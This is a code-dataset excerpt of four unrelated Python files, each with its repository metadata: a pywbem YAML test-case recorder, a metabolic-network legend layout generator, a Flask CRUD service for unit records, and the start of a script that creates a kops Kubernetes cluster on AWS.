        if pywbem_result.ret is not None:
            yaml_txt = 'pullresult' if self._pull_op else 'result'
            tc_pywbem_response[yaml_txt] = self.toyaml(pywbem_result.ret)
        if pywbem_result.exc is not None:
            exc = pywbem_result.exc
            if isinstance(exc, CIMError):
                tc_pywbem_response['cim_status'] = self.toyaml(exc.status_code)
            else:
                tc_pywbem_response['exception'] = self.toyaml(
                    exc.__class__.__name__)
        testcase['pywbem_response'] = tc_pywbem_response

        # http_request section: verb, URL, filtered headers and CIM-XML data.
        tc_http_request = OrderedDict()
        if http_request is not None:
            tc_http_request['verb'] = http_request.method
            tc_http_request['url'] = TestClientRecorder.TESTCASE_URL
            if http_request.target:
                tc_http_request['url'] += http_request.target
            tc_request_headers = OrderedDict()
            if http_request.headers is not None:
                for hdr_name in http_request.headers:
                    if hdr_name.lower() not in \
                            TestClientRecorder.EXCLUDE_REQUEST_HEADERS:
                        tc_request_headers[hdr_name] = \
                            http_request.headers[hdr_name]
            tc_http_request['headers'] = tc_request_headers
            if http_request.payload is not None:
                data = http_request.payload.decode('utf-8')
                # pretty-print the XML: one element per line
                data = data.replace('><', '>\n<').strip()
            else:
                data = None
            tc_http_request['data'] = data
        testcase['http_request'] = tc_http_request

        # http_response section (or a placeholder exception callback when no
        # response was received).
        tc_http_response = OrderedDict()
        if http_response is not None:
            tc_http_response['status'] = http_response.status
            tc_response_headers = OrderedDict()
            if http_response.headers is not None:
                for hdr_name in http_response.headers:
                    if hdr_name.lower() not in \
                            TestClientRecorder.EXCLUDE_RESPONSE_HEADERS:
                        tc_response_headers[hdr_name] = \
                            http_response.headers[hdr_name]
            tc_http_response['headers'] = tc_response_headers
            if http_response.payload is not None:
                data = http_response.payload.decode('utf-8')
                data = data.replace('><', '>\n<').strip()
            else:
                data = None
            tc_http_response['data'] = data
        else:
            tc_http_response['exception'] = "# Change this to a callback " \
                                            "function that causes this " \
                                            "condition."
        testcase['http_response'] = tc_http_response

        testcases = []
        testcases.append(testcase)

        # The file is open in text mode, so we produce a unicode string
        data = yaml.safe_dump(testcases, encoding=None, allow_unicode=True,
                              default_flow_style=False, indent=4)
        data = data.replace('\n\n', '\n')  # YAML dump duplicates newlines
        self._fp.write(data)
        self._fp.flush()

    def toyaml(self, obj):
        """
        Convert any allowable input argument to or return value from an
        operation method to an object that is ready for serialization into
        test_client yaml format.

        Recursively maps containers and CIM objects onto OrderedDicts
        (tagged with 'pywbem_object') and plain python scalars; raises
        TypeError for unsupported types.
        """
        # namedtuple is subclass of tuple so it is instance of tuple but
        # not type tuple. Cvt to dictionary and cvt dict to yaml.
        # pylint: disable=unidiomatic-typecheck
        if isinstance(obj, tuple) and type(obj) is not tuple:
            ret_dict = obj._asdict()
            return self.toyaml(ret_dict)
        if isinstance(obj, (list, tuple)):
            ret = []
            # This does not handle namedtuple
            for item in obj:
                ret.append(self.toyaml(item))
            return ret
        elif isinstance(obj, (dict, NocaseDict)):
            ret_dict = OrderedDict()
            for key in obj.keys():  # get keys in original case
                ret_dict[key] = self.toyaml(obj[key])
            return ret_dict
        elif obj is None:
            return obj
        elif isinstance(obj, six.binary_type):
            return obj.decode("utf-8")
        elif isinstance(obj, six.text_type):
            return obj
        elif isinstance(obj, CIMInt):
            return _Longint(obj)
        elif isinstance(obj, (bool, int)):
            # TODO ks jun 17 should the above be six.integertypes???
            # The check for int must be after CIMInt, because CIMInt is int.
            return obj
        elif isinstance(obj, CIMFloat):
            return float(obj)
        elif isinstance(obj, CIMDateTime):
            return str(obj)
        elif isinstance(obj, datetime):
            return CIMDateTime(obj)
        elif isinstance(obj, timedelta):
            return CIMDateTime(obj)
        elif isinstance(obj, CIMInstance):
            ret_dict = OrderedDict()
            ret_dict['pywbem_object'] = 'CIMInstance'
            ret_dict['classname'] = self.toyaml(obj.classname)
            ret_dict['properties'] = self.toyaml(obj.properties)
            ret_dict['path'] = self.toyaml(obj.path)
            return ret_dict
        elif isinstance(obj, CIMInstanceName):
            ret_dict = OrderedDict()
            ret_dict['pywbem_object'] = 'CIMInstanceName'
            ret_dict['classname'] = self.toyaml(obj.classname)
            ret_dict['namespace'] = self.toyaml(obj.namespace)
            ret_dict['keybindings'] = self.toyaml(obj.keybindings)
            return ret_dict
        elif isinstance(obj, CIMClass):
            ret_dict = OrderedDict()
            ret_dict['pywbem_object'] = 'CIMClass'
            ret_dict['classname'] = self.toyaml(obj.classname)
            ret_dict['superclass'] = self.toyaml(obj.superclass)
            ret_dict['properties'] = self.toyaml(obj.properties)
            ret_dict['methods'] = self.toyaml(obj.methods)
            ret_dict['qualifiers'] = self.toyaml(obj.qualifiers)
            return ret_dict
        elif isinstance(obj, CIMClassName):
            ret_dict = OrderedDict()
            ret_dict['pywbem_object'] = 'CIMClassName'
            ret_dict['classname'] = self.toyaml(obj.classname)
            ret_dict['host'] = self.toyaml(obj.host)
            ret_dict['namespace'] = self.toyaml(obj.namespace)
            return ret_dict
        elif isinstance(obj, CIMProperty):
            ret_dict = OrderedDict()
            ret_dict['pywbem_object'] = 'CIMProperty'
            ret_dict['name'] = self.toyaml(obj.name)
            ret_dict['value'] = self.toyaml(obj.value)
            ret_dict['type'] = self.toyaml(obj.type)
            ret_dict['reference_class'] = self.toyaml(obj.reference_class)
            ret_dict['embedded_object'] = self.toyaml(obj.embedded_object)
            ret_dict['is_array'] = self.toyaml(obj.is_array)
            ret_dict['array_size'] = self.toyaml(obj.array_size)
            ret_dict['class_origin'] = self.toyaml(obj.class_origin)
            ret_dict['propagated'] = self.toyaml(obj.propagated)
            ret_dict['qualifiers'] = self.toyaml(obj.qualifiers)
            return ret_dict
        elif isinstance(obj, CIMMethod):
            ret_dict = OrderedDict()
            ret_dict['pywbem_object'] = 'CIMMethod'
            ret_dict['name'] = self.toyaml(obj.name)
            ret_dict['return_type'] = self.toyaml(obj.return_type)
            ret_dict['class_origin'] = self.toyaml(obj.class_origin)
            ret_dict['propagated'] = self.toyaml(obj.propagated)
            ret_dict['parameters'] = self.toyaml(obj.parameters)
            ret_dict['qualifiers'] = self.toyaml(obj.qualifiers)
            return ret_dict
        elif isinstance(obj, CIMParameter):
            ret_dict = OrderedDict()
            ret_dict['pywbem_object'] = 'CIMParameter'
            ret_dict['name'] = self.toyaml(obj.name)
            ret_dict['type'] = self.toyaml(obj.type)
            ret_dict['reference_class'] = self.toyaml(obj.reference_class)
            ret_dict['is_array'] = self.toyaml(obj.is_array)
            ret_dict['array_size'] = self.toyaml(obj.array_size)
            ret_dict['qualifiers'] = self.toyaml(obj.qualifiers)
            return ret_dict
        elif isinstance(obj, CIMQualifier):
            ret_dict = OrderedDict()
            ret_dict['pywbem_object'] = 'CIMQualifier'
            ret_dict['name'] = self.toyaml(obj.name)
            ret_dict['value'] = self.toyaml(obj.value)
            ret_dict['type'] = self.toyaml(obj.type)
            ret_dict['propagated'] = self.toyaml(obj.propagated)
            ret_dict['tosubclass'] = self.toyaml(obj.tosubclass)
            ret_dict['toinstance'] = self.toyaml(obj.toinstance)
            ret_dict['overridable'] = self.toyaml(obj.overridable)
            ret_dict['translatable'] = self.toyaml(obj.translatable)
            return ret_dict
        elif isinstance(obj, CIMQualifierDeclaration):
            ret_dict = OrderedDict()
            ret_dict['pywbem_object'] = 'CIMQualifierDeclaration'
            ret_dict['name'] = self.toyaml(obj.name)
            ret_dict['type'] = self.toyaml(obj.type)
            ret_dict['value'] = self.toyaml(obj.value)
            ret_dict['is_array'] = self.toyaml(obj.is_array)
            ret_dict['array_size'] = self.toyaml(obj.array_size)
            ret_dict['scopes'] = self.toyaml(obj.scopes)
            ret_dict['tosubclass'] = self.toyaml(obj.tosubclass)
            ret_dict['toinstance'] = self.toyaml(obj.toinstance)
            ret_dict['overridable'] = self.toyaml(obj.overridable)
            ret_dict['translatable'] = self.toyaml(obj.translatable)
            return ret_dict
        else:
            raise TypeError("Invalid type in TestClientRecorder.toyaml(): "
                            "%s %s" % (obj.__class__.__name__, type(obj)))
| ssOleg/pywbem | pywbem/_recorder.py | _recorder.py | py | 36,379 | python | en | code | null | github-code | 36 | [
{
"api_name": "six.PY2",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "six.PY2",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "collections.namedtuple",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "yaml.MappingNode",
... |
17849611547 | from ..config import np, Vector, DataName, MetaboliteConfig, ParameterName, LegendConfig
from ..metabolic_network_contents.metabolite import Metabolite
from ..metabolic_network_contents.reaction import Reaction
# Shorthand for the configured metabolite patch width; reused below as the flux arrow length.
metabolite_width = MetaboliteConfig.width
class NormalLegendConfig(object):
    """Legend entries for the standard (and horizontal) metabolic network figure.

    Each attribute maps a legend key to either the example patch object(s) to
    draw (metabolites / reactions) or the caption displayed next to it; keys
    must agree across the three dicts.
    """
    # Example metabolite patches, each styled to demonstrate one display state.
    metabolite_content_dict = {
        'G6P': Metabolite('G6P'),
        'LAC': Metabolite('LAC').set_mid_data_state(True),
        'MAL': Metabolite('MAL').set_mid_data_state(True).set_mixed_mid_data_state(True),
        'GLU': Metabolite('GLU').set_biomass_flux_state(True),
        'GLY': Metabolite('GLY').set_input_state(True),
        'GLC': Metabolite('GLC').set_input_state(True).set_c13_labeling_state(True),
    }
    # Example reaction arrows; a tuple stacks several arrows in one legend row.
    reaction_content_dict = {
        'fluxes': (Reaction('unidirectional'), Reaction('bidirectional', reversible=True)),
        'boundary_flux': Reaction('boundary_flux').set_boundary_flux(True),
    }
    # Captions keyed consistently with the two dicts above.
    text_content_dict = {
        'G6P': 'Normal metabolites',
        'LAC': 'Metabolites with mass spec data',
        'MAL': 'Metabolites with mixed mass spec\ndata (mitochondria and cytosol)',
        'GLU': 'Metabolites with biomass flux',
        'GLY': 'Input or output metabolites\nwith fixed MID',
        'GLC': 'Input metabolites with $\mathregular{^{13}}$C\nlabelled',
        'fluxes': 'Normal fluxes (unidirectional\nor reversible)',
        'boundary_flux': 'Boundary fluxes with fixed value',
    }
class SmallerSizeLegendConfig(object):
    """Legend entries for the data-size-sensitivity figure.

    Metabolites are styled by which progressively smaller data set still
    contains their MID measurement.
    """
    metabolite_content_dict = {
        'GLN': Metabolite('GLN').set_input_state(True),
        'OAC': Metabolite('OAC'),
        'MAL': Metabolite('MAL').set_data_sensitivity_state(DataName.raw_model_raw_data),
        '3PG': Metabolite('3PG').set_data_sensitivity_state(DataName.medium_data),
        'GLC': Metabolite('GLC').set_data_sensitivity_state(DataName.few_data),
    }
    # This legend shows no example reactions.
    reaction_content_dict = {}
    text_content_dict = {
        'GLN': 'Input or output metabolites\nwith fixed MID',
        'OAC': 'With MID data in all data set',
        'MAL': 'With MID data in all + experimental\ndata set',
        '3PG': 'With MID data in all + experimental\n+ medium data set',
        'GLC': 'With MID data in all + experimental\n+ medium + small data set',
    }
class RemovePathwayLegendConfig(object):
    """Legend entries for the removed-pathway figure.

    Metabolites are styled by which pathway's MID data (PPP / TCA / AA) was
    removed from the experimental data set.
    """
    metabolite_content_dict = {
        'LAC': Metabolite('LAC').set_mid_data_state(True),
        'R5P': Metabolite('R5P').set_data_sensitivity_state(DataName.data_without_ppp),
        'MAL': Metabolite('MAL').set_data_sensitivity_state(DataName.data_without_tca),
        'GLU': Metabolite('GLU').set_data_sensitivity_state(DataName.data_without_aa),
        # 'CIT': Metabolite('CIT').set_data_sensitivity_state(DataName.medium_data_without_combination),
    }
    # This legend shows no example reactions.
    reaction_content_dict = {}
    text_content_dict = {
        'LAC': 'Experimental data set',
        'R5P': 'Removed MID data of PPP metabolites',
        'MAL': 'Removed MID data of TCA metabolites',
        'GLU': 'Removed MID data of AA metabolites',
        # 'CIT': 'Added compartmental MID',
    }
class ConstantFluxLegendConfig(object):
    """Legend entries for the constant-boundary-flux figure (reactions only)."""
    metabolite_content_dict = {}
    reaction_content_dict = {
        'fluxes': (Reaction('unidirectional'), Reaction('bidirectional', reversible=True)),
        'boundary_fluxes': Reaction('boundary_flux').set_boundary_flux(True),
    }
    text_content_dict = {
        'fluxes': 'Normal fluxes (unidirectional\nor reversible)',
        'boundary_fluxes': 'Preset fixed boundary fluxes',
    }
def legend_layout_generator(mode=ParameterName.normal):
    """Generate legend patch objects and text parameters for a network figure.

    Selects the legend configuration class matching *mode*, lays out its
    metabolite and reaction examples in a single column (two rows filled
    column-major for the horizontal mode) and returns
    ``(patch_raw_obj_dict, text_param_dict, total_width, total_height)``.

    Raises ValueError for an unknown *mode* or an unexpected reaction entry.
    """
    if mode == ParameterName.normal or mode == ParameterName.horizontal:
        legend_config = NormalLegendConfig
    elif mode == DataName.smaller_data_size:
        legend_config = SmallerSizeLegendConfig
    elif mode == DataName.data_without_pathway:
        legend_config = RemovePathwayLegendConfig
    elif mode == DataName.different_constant_flux:
        legend_config = ConstantFluxLegendConfig
    else:
        raise ValueError()
    metabolite_content_dict, reaction_content_dict, text_content_dict = \
        legend_config.metabolite_content_dict, legend_config.reaction_content_dict, legend_config.text_content_dict
    # Flatten metabolite entries first, then reaction entries, into one ordered list.
    total_item_list = []
    for metabolite_key, metabolite_content in metabolite_content_dict.items():
        text_content = text_content_dict[metabolite_key]
        total_item_list.append((ParameterName.metabolite, metabolite_key, metabolite_content, text_content))
    for reaction_key, reaction_content in reaction_content_dict.items():
        text_content = text_content_dict[reaction_key]
        total_item_list.append((ParameterName.reaction, reaction_key, reaction_content, text_content))
    total_item_num = len(total_item_list)
    each_row_height = LegendConfig.legend_each_row_height
    if mode == ParameterName.horizontal:
        # Horizontal legend: two rows; items fill columns left to right.
        total_row_num = 2
        total_col_num = np.ceil(total_item_num / 2)
        total_width = LegendConfig.legend_horizontal_width
    else:
        total_row_num = total_item_num
        total_col_num = 1
        total_width = LegendConfig.legend_width
    # Column-major placement: consecutive items fill a column before moving right.
    layout_index_list = [
        (item_index % total_row_num, item_index // total_row_num) for item_index in range(total_item_num)]
    total_height = total_row_num * each_row_height
    each_col_width = total_width / total_col_num
    multiple_reaction_up_down_distance = 0.005
    flux_width = metabolite_width
    # Patch sits in the left 30% of each column; the caption occupies the rest.
    base_patch_center_x_axis = 0.15 * each_col_width
    base_text_left_x_axis = 0.3 * each_col_width
    text_width = each_col_width - base_text_left_x_axis
    patch_raw_obj_dict = {}
    text_param_dict = {}
    for (row_index, col_index), (item_type, item_key, item_content, text_content) \
            in zip(layout_index_list, total_item_list):
        patch_center_x_axis = col_index * each_col_width + base_patch_center_x_axis
        text_left_x_axis = col_index * each_col_width + base_text_left_x_axis
        flux_left_x_value, flux_right_x_value = (
            patch_center_x_axis - flux_width / 2, patch_center_x_axis + flux_width / 2)
        # Irreversible arrows are drawn slightly shorter on the right end.
        irreversible_flux_right_x_value = 0.03 * flux_left_x_value + 0.97 * flux_right_x_value
        current_row_center_y_value = (total_row_num - row_index - 0.5) * each_row_height
        text_param_dict[item_key] = {
            ParameterName.center: Vector(text_left_x_axis + text_width / 2, current_row_center_y_value),
            ParameterName.string: text_content,
            ParameterName.width: text_width,
            ParameterName.height: each_row_height,
        }
        if item_type == ParameterName.metabolite:
            item_content.set_center(Vector(patch_center_x_axis, current_row_center_y_value))
            patch_raw_obj_dict[item_key] = item_content
        elif item_type == ParameterName.reaction:
            if isinstance(item_content, tuple):
                # Several example reactions share one legend row, stacked vertically.
                reaction_num = len(item_content)
                reaction_subrow_height = (each_row_height - 2 * multiple_reaction_up_down_distance) / reaction_num
                for reaction_subindex, reaction_obj in enumerate(item_content):
                    current_subrow_y_value = (
                        current_row_center_y_value + each_row_height / 2 - multiple_reaction_up_down_distance -
                        (reaction_subindex + 0.5) * reaction_subrow_height)
                    if reaction_obj.reversible:
                        current_flux_right_x_value = flux_right_x_value
                    else:
                        current_flux_right_x_value = irreversible_flux_right_x_value
                    reaction_obj.extend_reaction_start_end_list([
                        (
                            ParameterName.normal,
                            Vector(current_flux_right_x_value, current_subrow_y_value),
                            Vector(flux_left_x_value, current_subrow_y_value),
                            {}
                        )
                    ])
                    patch_raw_obj_dict[reaction_obj.reaction_name] = reaction_obj
            elif isinstance(item_content, Reaction):
                if item_content.reversible:
                    current_flux_right_x_value = flux_right_x_value
                else:
                    current_flux_right_x_value = irreversible_flux_right_x_value
                item_content.extend_reaction_start_end_list([
                    (
                        ParameterName.normal,
                        Vector(current_flux_right_x_value, current_row_center_y_value),
                        Vector(flux_left_x_value, current_row_center_y_value),
                        {}
                    )
                ])
                patch_raw_obj_dict[item_key] = item_content
            else:
                raise ValueError()
    return patch_raw_obj_dict, text_param_dict, total_width, total_height
| LocasaleLab/Automated-MFA-2023 | figures/figure_plotting/figure_elements/metabolic_network/layout_generator_functions/legend_layout_generator.py | legend_layout_generator.py | py | 11,543 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "config.MetaboliteConfig.width",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "config.MetaboliteConfig",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "metabolic_network_contents.metabolite.Metabolite",
"line_number": 12,
"usage_typ... |
42194340126 | import datetime
import math
from sqlalchemy import desc, asc
from app.main import db
from app.main.model.unit import Unit
from app.main.service.language_helper import LanguageHelper
def save_unit(data, args):
    """Create a new unit from *data* ({'name', 'description'}).

    Validates that the name is non-empty and not already taken, then persists
    the unit with UTC timestamps.

    Returns a (response_dict, http_status) tuple: 201 on success, 200 with
    status 'FAILED' and per-field errors otherwise.
    """
    errors = {}
    language_data = LanguageHelper(args)
    # Check unique field is null or not
    if data['name'] == "":
        errors['name'] = [language_data.get_message(
            'unit.save.no_unit_name_message')]
    if len(errors) > 0:
        response_object = {
            'status': 'FAILED',
            'message': language_data.get_message('unit.save.failed_message'),
            'errors': errors
        }
        return response_object, 200
    else:
        # Reject duplicate unit names before inserting.
        unit = Unit.query.filter_by(
            name=data['name']).first()
        if unit:
            errors['name'] = [language_data.get_message(
                'unit.save.existed_unit_name_message')]
            response_object = {
                'status': 'FAILED',
                'message': language_data.get_message('unit.save.failed_message'),
                'errors': errors
            }
            return response_object, 200
        else:
            new_unit = Unit(
                name=data['name'],
                description=data['description'],
                created_on=datetime.datetime.utcnow(),
                updated_on=datetime.datetime.utcnow()
            )
            save_changes(new_unit)
            # Echo the persisted fields back to the caller.
            output = {}
            output['name'] = new_unit.name
            output['description'] = new_unit.description
            output['created_on'] = str(new_unit.created_on)
            output['updated_on'] = str(new_unit.updated_on)
            response_object = {
                'status': 'SUCCESS',
                'message': language_data.get_message('unit.save.success_message'),
                'data': output
            }
            return response_object, 201
def update_unit(id, data, args):
    """Update the name and/or description of the unit with primary key *id*.

    Validates that the id exists, the new name is non-empty and not already
    used by another unit; bumps ``updated_on`` and commits only when a field
    actually changed. Returns a (response_dict, 200) tuple.
    """
    unit = Unit.query.filter_by(id=id).first()
    is_updated = False
    errors = {}
    language_data = LanguageHelper(args)
    # Check if ID is valid or not
    if not unit:
        errors['id'] = ["Unit ID does not exist!"]
        response_object = {
            'status': 'FAILED',
            'message': language_data.get_message('unit.update.failed_message'),
            'errors': errors
        }
        return response_object, 200
    else:
        # Check null
        if data['name'] == "":
            errors['name'] = [language_data.get_message(
                'unit.update.no_unit_message')]
        if (len(errors) > 0):
            response_object = {
                'status': 'FAILED',
                'message': language_data.get_message('unit.update.failed_message'),
                'errors': errors
            }
            return response_object, 200
        else:
            if data['name'] != unit.name:
                # Check if unit name is existed or not
                updated_unit = Unit.query.filter_by(name=data['name']).first()
                if updated_unit:
                    errors['name'] = [language_data.get_message(
                        'unit.update.existed_unit_name_message')]
                    response_object = {
                        'status': 'FAILED',
                        'message': language_data.get_message('unit.update.failed_message'),
                        'errors': errors
                    }
                    return response_object, 200
                else:
                    is_updated = True
                    unit.name = data['name']
            if data['description'] != unit.description:
                is_updated = True
                unit.description = data['description']
            if is_updated is True:
                # Only touch the timestamp and commit when something changed.
                unit.updated_on = datetime.datetime.utcnow()
                db.session.commit()
            unit_data = {}
            unit_data['id'] = str(unit.id)
            unit_data['name'] = unit.name
            unit_data['description'] = unit.description
            unit_data['created_on'] = str(unit.created_on)
            unit_data['updated_on'] = str(unit.updated_on)
            respone_object = {
                'status': 'SUCCESS',
                'message': language_data.get_message('unit.update.success_message'),
                'data': unit_data
            }
            return respone_object, 200
def get_all_units(args):
    """Serialize every stored unit.

    Returns a (response_dict, 200) tuple whose data payload is
    ``{'units': [ ...serialized units... ]}``.
    """
    language_helper = LanguageHelper(args)
    unit_list = [
        {
            'id': unit.id,
            'name': unit.name,
            'description': unit.description,
            'created_on': str(unit.created_on),
            'updated_on': str(unit.updated_on),
        }
        for unit in Unit.query.all()
    ]
    response = {
        'status': 'SUCCESS',
        'message': language_helper.get_message('unit.get_all.success_message'),
        'data': {'units': unit_list},
    }
    return response, 200
def get_unit(id, args):
    """Fetch one unit by primary key and serialize it.

    Returns (response_dict, 200); the status is 'ERROR' when the id is unknown.
    """
    language_helper = LanguageHelper(args)
    unit = Unit.query.filter_by(id=id).first()
    if unit is None:
        return {
            'status': 'ERROR',
            'message': language_helper.get_message('unit.get.no_unit_message'),
        }, 200
    serialized = {
        'id': unit.id,
        'name': unit.name,
        'description': unit.description,
        'created_on': str(unit.created_on),
        'updated_on': str(unit.updated_on),
    }
    # NOTE(review): the success message key below says 'delete' — looks like a
    # copy-paste slip, but changing it needs a matching language-file entry.
    return {
        'status': 'SUCCESS',
        'message': language_helper.get_message('unit.delete.success_message'),
        'data': serialized,
    }, 200
def delete_unit(id, args):
    """Delete the unit with primary key *id*.

    Returns (response_dict, 200); status 'FAILED' when the id is unknown.
    """
    language_helper = LanguageHelper(args)
    unit = Unit.query.filter_by(id=id).first()
    if unit is None:
        return {
            'status': 'FAILED',
            'message': language_helper.get_message('unit.delete.no_unit_message'),
            'errors': {},
        }, 200
    db.session.delete(unit)
    db.session.commit()
    return {
        'status': 'SUCCESS',
        'message': language_helper.get_message('unit.delete.success_message'),
    }, 200
def save_changes(data):
    """Add *data* to the SQLAlchemy session and commit immediately."""
    db.session.add(data)
    db.session.commit()
def get_all_units_with_pagination(args):
    """Return one page of units, optionally filtered by a case-insensitive keyword.

    Supported query params (all optional): page_size (default 10),
    current_page (default 1), key_word, sort_field, sort_order
    (-1 = descending, which is the default).

    NOTE(review): the keyword filter is applied *after* pagination, so a
    filtered page may contain fewer than page_size rows and total_pages counts
    unfiltered rows; changing that would alter the API's observable behavior.

    Returns a (response_dict, 200) tuple.
    """
    page_size = 10
    current_page = 1
    next_page = False
    key_word = None
    sort_field = None
    sort_order = -1
    if "page_size" in args:
        page_size = int(args['page_size'])
    if "current_page" in args:
        current_page = int(args['current_page'])
    if "key_word" in args:
        # Lower-case once so the comparison below against lower-cased fields
        # can match regardless of the caller's capitalization (previously the
        # raw keyword was compared and any upper-case letter never matched).
        key_word = args['key_word'].lower()
    if "sort_field" in args:
        sort_field = args['sort_field']
    if "sort_order" in args:
        sort_order = int(args['sort_order'])
    languages_data = LanguageHelper(args)
    if sort_field is None or sort_order is None:
        '''Default order by the lasted created_on value'''
        units = Unit.query.order_by(Unit.created_on.desc())
    elif sort_order == -1:
        units = Unit.query.order_by(desc(sort_field))
    else:
        units = Unit.query.order_by(asc(sort_field))
    units_on_page = units.limit(page_size).offset(
        (current_page - 1) * page_size)
    total_count = units.count()
    total_pages = math.ceil(total_count / page_size)
    # There is a next page exactly when rows remain beyond the current page
    # (the old code applied math.ceil() to this boolean, a no-op).
    next_page = total_count - page_size * current_page > 0
    output = []
    for unit in units_on_page:
        # Keyword filter (within the current page only, see NOTE above).
        if key_word is not None and (
                key_word not in unit.name.lower()
                and key_word not in unit.description.lower()):
            continue
        output.append({
            'id': unit.id,
            'name': unit.name,
            'description': unit.description,
            'created_on': str(unit.created_on),
            'updated_on': str(unit.updated_on),
        })
    data = {
        'units': output,
        'total_pages': total_pages,
        'current_page': current_page,
        'has_next_page': next_page,
    }
    response_object = {
        'status': 'SUCCESS',
        'message': languages_data.get_message('unit.get_all_with_pagination.success_message'),
        'data': data,
    }
    return response_object, 200
| viettiennguyen029/recommendation-system-api | app/main/service/unit_service.py | unit_service.py | py | 9,022 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "app.main.service.language_helper.LanguageHelper",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "app.main.model.unit.Unit.query.filter_by",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "app.main.model.unit.Unit.query",
"line_number": 27,
... |
2036516482 | import os
import pathlib
import argparse
import uuid
import logging
import subprocess
from nuvoloso.dependencies.install_packages import InstallPackages
from nuvoloso.dependencies.kops_cluster import KopsCluster
from nuvoloso.dependencies.kubectl_helper import KubectlHelper
from nuvoloso.api.nuvo_management import NuvoManagement
# Default Ubuntu 18.04 AMI used for every cluster instance.
DEFAULT_AMI = '099720109477/ubuntu/images/hvm-ssd/ubuntu-bionic-18.04-amd64-server-20190212.1'
# Fallback kops cluster name when KOPS_CLUSTER_NAME is not set.
DEFAULT_CENTRALD_CLUSTER_NAME = "nuvotestfiomulti.k8s.local"
# File where the created Nuvo cluster name is written for later pipeline steps.
NUVO_CLUSTER_NAME = "./nuvo_cluster_name.txt"
class CreateAppCluster:
    """Create a kops Kubernetes cluster on AWS and, unless --create_only is
    set, register it as an application cluster with the Nuvo management plane.
    """

    def __init__(self, args):
        # args: argparse namespace produced in main().
        self.args = args
        if not args.create_only:
            self.nuvo_mgmt = NuvoManagement(args)
            self.kubectl_helper = KubectlHelper(args)

    def install_dependencies(self):
        """Install kops/kubectl/awscli on this host and prepare AWS access."""
        InstallPackages.apt_get_update()
        InstallPackages.install_kops()
        InstallPackages.install_kubectl()
        InstallPackages.install_awscli()
        InstallPackages.configure_aws(self.args)
        InstallPackages.generate_sshkeypair()
        return

    def set_protection_domains(self, csp_domain_id, nuvo_cluster_name):
        """Create and activate a protection domain for every account.

        Each account is first authorized via a service plan allocation, then
        switched into so the protection domain is created under that account.
        """
        accounts = self.nuvo_mgmt.get_all_accounts()
        admin_account = self.args.account_name
        for account in accounts:
            # Creating spa to authorize accounts, so it can set protection domains
            self.nuvo_mgmt.do_service_plan_allocation(nuvo_cluster_name, account['name'])
            self.nuvo_mgmt.switch_accounts(account['name'])
            protection_domain_id = self.nuvo_mgmt.create_protection_domain()
            self.nuvo_mgmt.set_protection_domain(protection_domain_id, csp_domain_id)
            # NOTE(review): original indentation was lost in extraction; restoring
            # the admin context each iteration so the next SPA call runs as admin
            # — confirm against project history.
            self.nuvo_mgmt.switch_accounts(admin_account)

    def create_application_cluster(self):
        """Create the kops cluster; unless --create_only, also wire it into
        Nuvo (CSP domain, clusterd, protection domains, snapshot catalog).

        Returns the Nuvo cluster name (None when --create_only short-circuits).
        """
        self.install_dependencies()
        KopsCluster.create_kops_app_cluster(self.args)
        if self.args.create_only:
            return
        try:
            csp_domain_id = self.nuvo_mgmt.create_csp_domain()
            nuvo_cluster_name = self.nuvo_mgmt.deploy_clusterd(csp_domain_id)
            logging.info("Nuvo cluster created : %s", nuvo_cluster_name)
            self.set_protection_domains(csp_domain_id, nuvo_cluster_name)
            snapshot_catalog_pd = self.nuvo_mgmt.create_protection_domain()
            self.nuvo_mgmt.set_snapshot_catalog_policy(snapshot_catalog_pd, csp_domain_id)
        except subprocess.CalledProcessError as err:
            # Surface captured subprocess output before propagating the failure.
            if err.output: logging.info(err.output)
            raise
        return nuvo_cluster_name
def main():
    """Parse CLI/environment configuration, create the kops application
    cluster, and (unless --create_only) register it with the Nuvo kontroller,
    writing the resulting Nuvo cluster name to NUVO_CLUSTER_NAME."""
    default_cluster_name = DEFAULT_CENTRALD_CLUSTER_NAME
    default_aws_access_key = default_aws_secret_access_key = default_kops_state_store = None
    if os.environ.get('KOPS_CLUSTER_NAME'):
        default_cluster_name = os.environ.get('KOPS_CLUSTER_NAME')
    # BUG FIX: the KOPS_STATE_STORE and AWS_SECRET_ACCESS_KEY checks previously
    # read "is None", which ignored the variable whenever it WAS set and
    # assigned None otherwise; they now mirror the other two lookups.
    if os.environ.get('KOPS_STATE_STORE'):
        default_kops_state_store = os.environ.get('KOPS_STATE_STORE')
    if os.environ.get('AWS_ACCESS_KEY_ID'):
        default_aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
    if os.environ.get('AWS_SECRET_ACCESS_KEY'):
        default_aws_secret_access_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
    parser = argparse.ArgumentParser(description="Deploys a kops cluster with "
                                     "Nuvo data plane and runs fio against all volumes")
    parser.add_argument(
        '--kops_cluster_name', help='name of kops cluster for Nuvo Data Plane[default: ' +
        default_cluster_name + ']',
        default=default_cluster_name)
    parser.add_argument(
        '--nodes', help='number of nodes in the cluster [default=3]', type=int, default=3,
        choices=range(1, 101))
    parser.add_argument(
        '--kops_state_store', help='state store for cluster',
        default=default_kops_state_store)
    parser.add_argument(
        '--aws_access_key', help='aws AccessKey', default=default_aws_access_key)
    parser.add_argument(
        '--aws_secret_access_key', help='aws SecretAccessKey',
        default=default_aws_secret_access_key)
    parser.add_argument(
        '--region', help='aws region', default=None)
    parser.add_argument(
        '--k8s_master_zone', help='aws zone for master node',
        default=None)
    parser.add_argument(
        '--k8s_nodes_zone', help='aws zone for other nodes ',
        default=None)
    parser.add_argument(
        '--master_size', help='ec2 instance type for master node ', default=None)
    parser.add_argument(
        '--node_size', help='ec2 instance type for other nodes ', default=None)
    parser.add_argument(
        '--nuvo_kontroller_hostname', help='Hostname of https svc of Nuvo Kontroller')
    parser.add_argument(
        '--log_dirpath', help='log dir to hold test and nuvo logs', default=None)
    parser.add_argument(
        '--kubernetes_version', help='version of kubernetes to deploy', default='1.14.8')
    parser.add_argument(
        '--image', help='AMI Image for all instances', default=DEFAULT_AMI)
    parser.add_argument(
        '--node_volume_size', help='volume size for slave nodes of k8s cluster', type=int,
        default=10)
